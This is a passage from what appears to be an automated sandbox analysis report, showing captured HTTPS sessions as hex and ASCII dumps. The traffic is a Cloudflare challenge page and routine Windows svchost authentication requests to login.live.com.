                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:37 UTC1280INHTTP/1.1 403 Forbidden
                                                        Date: Wed, 03 Jul 2024 19:06:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 21409
                                                        Connection: close
                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Resource-Policy: same-origin
                                                        Origin-Agent-Cluster: ?1
                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                        Referrer-Policy: same-origin
                                                        X-Content-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        cf-mitigated: challenge
                                                        2024-07-03 19:06:37 UTC652INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 56 6f 42 61 44 7a 6b 75 45 48 38 35 46 48 45 74 71 68 5a 69 41 51 70 54 31 47 42 32 58 66 70 41 72 34 6c 50 75 70 79 59 39 61 45 39 43 67 36 62 66 5a 6e 33 7a 42 59 77 33 5a 53 6d 72 57 75 76 35 6c 47 48 6e 7a 62 58 4b 42 47 32 52 53 53 74 51 79 47 6d 53 6c 65 4b 72 78 34 59 4e 6c 71 71 35 68 49 47 36 4f 33 4c 4d 44 72 68 63 31 45 71 64 59 79 76 64 4f 4a 43 6e 72 42 2f 73 74 62 53 70 61 76 2f 49 46 77 4e 48 67 61 65 2f 4d 38 46 51 52 45 45 58 67 3d 3d 24 42 43 55 73 66 7a 72 45 65 77 2f 65 2b 2f 7a 6f 6f 54 6e 48 6b 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                        Data Ascii: cf-chl-out: VoBaDzkuEH85FHEtqhZiAQpT1GB2XfpAr4lPupyY9aE9Cg6bfZn3zBYw3ZSmrWuv5lGHnzbXKBG2RSStQyGmSleKrx4YNlqq5hIG6O3LMDrhc1EqdYyvdOJCnrB/stbSpav/IFwNHgae/M8FQREEXg==$BCUsfzrEew/e+/zooTnHkA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                        2024-07-03 19:06:37 UTC806INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a
                                                        Data Ascii: t transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIz
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                        Data Ascii: dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .pow-button{background-
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64
                                                        Data Ascii: NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{border-color:#595959 transparent transparent}bod
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74
                                                        Data Ascii: 4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decorat
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c
                                                        Data Ascii: xsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtL
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d
                                                        Data Ascii: width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d
                                                        Data Ascii: }.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:0;padding-right:34px}</style><meta http-equiv=
                                                        2024-07-03 19:06:37 UTC1369INData Raw: 37 4b 59 64 6a 51 65 4f 53 4b 45 2d 32 46 53 69 44 36 55 4e 78 63 37 4a 51 4e 52 57 6b 64 6e 4b 31 52 54 43 37 65 6f 45 4d 5a 6d 73 38 32 75 43 61 38 66 4a 51 49 6f 4d 67 71 42 74 39 31 4e 72 63 64 5a 49 44 4f 4e 61 47 68 68 70 48 58 52 68 51 31 56 62 59 70 35 68 36 43 6f 77 2d 33 44 2d 33 44 26 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 69 44 4b 59 70 65 76 70 74 73 4a 4f 30 51 53 45 6d 41 6d 4d 47 72 59 34 77 4c 42 56 77 77 51 32 7a 68 31 78 31 51 73 79 71 30 6f 2d 31 37 32 30 30 33 33 35 39 37 2d 30 2e 30 2e 31 2e 31 2d 36 32 32 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 63 4d 54 69 6d 65 4d 73 3a 20 27 33 39 30 30 30 30 27 2c 63 54 70 6c 56 3a 20 35 2c 63 54 70 6c 42 3a 20 27 63 66 27 2c 63 4b 3a 20 22 22 2c
                                                        Data Ascii: 7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D&__cf_chl_tk=iDKYpevptsJO0QSEmAmMGrY4wLBVwwQ2zh1x1Qsyq0o-1720033597-0.0.1.1-6228",cFPWv: 'g',cTTimeMs: '1000',cMTimeMs: '390000',cTplV: 5,cTplB: 'cf',cK: "",


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.54972420.190.159.23443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:37 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 4694
                                                        Host: login.live.com
                                                        2024-07-03 19:06:37 UTC4694OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:38 UTC657INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:38 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        FdrTelemetry: &481=21&59=5&213=280810&215=0&315=1&215=0&315=1&214=30&288=16.0.30275.14
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: b9e68ac1-1edc-4bea-a322-ec5d3e1d93fc
                                                        PPServer: PPV: 30 H: PH1PEPF0001202F V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:38 GMT
                                                        Connection: close
                                                        Content-Length: 10877
                                                        2024-07-03 19:06:38 UTC10877INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.54972520.190.159.23443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:37 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 4694
                                                        Host: login.live.com
                                                        2024-07-03 19:06:37 UTC4694OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:38 UTC569INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:38 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: 231790f3-b16b-4c45-9dbf-1a2fa13be4fc
                                                        PPServer: PPV: 30 H: PH1PEPF00012036 V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:37 GMT
                                                        Connection: close
                                                        Content-Length: 10877
                                                        2024-07-03 19:06:38 UTC10877INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.54972620.190.159.4443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:37 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 4775
                                                        Host: login.live.com
                                                        2024-07-03 19:06:37 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
